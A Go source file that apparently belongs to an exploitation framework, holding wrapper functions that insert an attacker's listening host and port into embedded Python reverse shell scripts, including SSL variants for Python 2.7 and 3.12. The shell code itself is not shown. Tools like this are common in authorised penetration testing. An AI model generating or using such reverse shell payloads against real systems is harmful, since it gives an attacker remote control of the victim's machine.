package reverse

import (
	_ "embed"
	"fmt"
)

var (
	PythonDefault = Python27

	//go:embed python/reverse27.py
	Python27 string
	//go:embed python/reverse27_secure.py
	Python27Secure string
	//go:embed python/reverse3_12_secure.py
	Python3_12Secure string
)

func (py *PythonPayload) Default(lhost string, lport int) string {
	return py.Python27(lhost, lport)
}

// An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func (py *PythonPayload) Python27(lhost string, lport int) string {
	return fmt.Sprintf(PythonDefault, lhost, lport)
}

// An unflattened reverse shell that uses an SSL socket, works on Python 2.7, 3+, Windows and Linux.
func (py *PythonPayload) SecurePython27(lhost string, lport int) string {
	return fmt.Sprintf(Python27Secure, lhost, lport)
}

// An unflattened reverse shell that uses an SSL socket for Python 3.12 context, Windows and Linux.
// This payload is required when doing 3.12 SSL reverse shells as Python moved to requiring SSL
// context over simple socket wraps.
func (py *PythonPayload) SecurePython312(lhost string, lport int) string {
	return fmt.Sprintf(Python3_12Secure, lhost, lport)
}
